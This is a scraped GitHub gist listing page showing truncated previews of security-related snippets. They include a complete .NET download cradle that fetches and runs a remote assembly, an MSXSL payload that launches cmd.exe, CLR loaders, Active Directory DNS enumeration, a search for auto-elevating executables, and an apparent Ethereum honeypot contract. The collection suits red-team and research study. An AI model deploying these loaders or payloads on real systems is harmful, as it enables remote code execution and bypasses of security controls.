Skip to content

Instantly share code, notes, and snippets.


Franci Šacer fsacer

Block or report user

Report or block fsacer

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
3xocyte /
Last active Aug 9, 2019
get /etc/hosts entries from ADIDNS
#!/usr/bin/env python
import argparse
import sys
import binascii
import socket
import re
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES
# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte)

Windows Toolkit


Native Binaries

IDA Plugins Preferred Neutral Unreviewed
View AcoraidaMonicaGame.sol
pragma solidity =0.4.25;
contract AcoraidaMonicaGame{
uint256 public version = 4;
string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?";
string public constant sampleQuestion = "Who is Acoraida Monica?";
string public constant sampleAnswer = "$*!&#^[` a@.3;Ta&*T` R`<`~5Z`^5V You beat me! :D";
Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3);
address questioner;
string public question;
caseysmithrc / example.cs
Last active Mar 9, 2019
Loads .NET Assembly into script host from current path
View example.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Evilcry / findautoelevate.ps1
Created Jul 8, 2018
Enumerate executables with auto-elevation enabled
View findautoelevate.ps1
# Find Autoelevate executables
Write-Host "System32 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black
Select-String -Path C:\Windows\System32\*.exe -pattern "<AutoElevate>true"
Write-Host "`nSysWOW64 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black
Select-String -Path C:\Windows\SysWOW64\*.exe -pattern "<AutoElevate>true"
Neo23x0 /
Last active May 19, 2019
Typical False Positive Hashes
# This GIST has been transformed into a Git repository and does not receive updates anymore
# Please visit the github repo to get a current list
# Hashes that are often included in IOC lists but are false positives
# Empty file
cobbr / DotnetAssemblyDownloadCradle.cs
Created Jun 20, 2018
A download cradle for .NET assemblies.
View DotnetAssemblyDownloadCradle.cs
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
xpn / clr_via_native.c
Created Apr 11, 2018
A quick example showing loading CLR via native code
View clr_via_native.c
#include "stdafx.h"
int main()
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
caseysmithrc / minimalist.xml
Last active Nov 4, 2018
MSXSL Single File Payload
View minimalist.xml
<?xml version='1.0'?>
xmlns="" xmlns:ms="urn:schemas-microsoft-com:xslt"
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
LiveOverflow / software_update.sage
Created Mar 16, 2018
34C3 CTF software_update (crypto)
View software_update.sage
import sage.all
import hashlib
# part1 -
# part2 -
# prepare a table of bits
def bits_of(x):
bits = []
for c in "{:08b}".format(x):
You can’t perform that action at this time.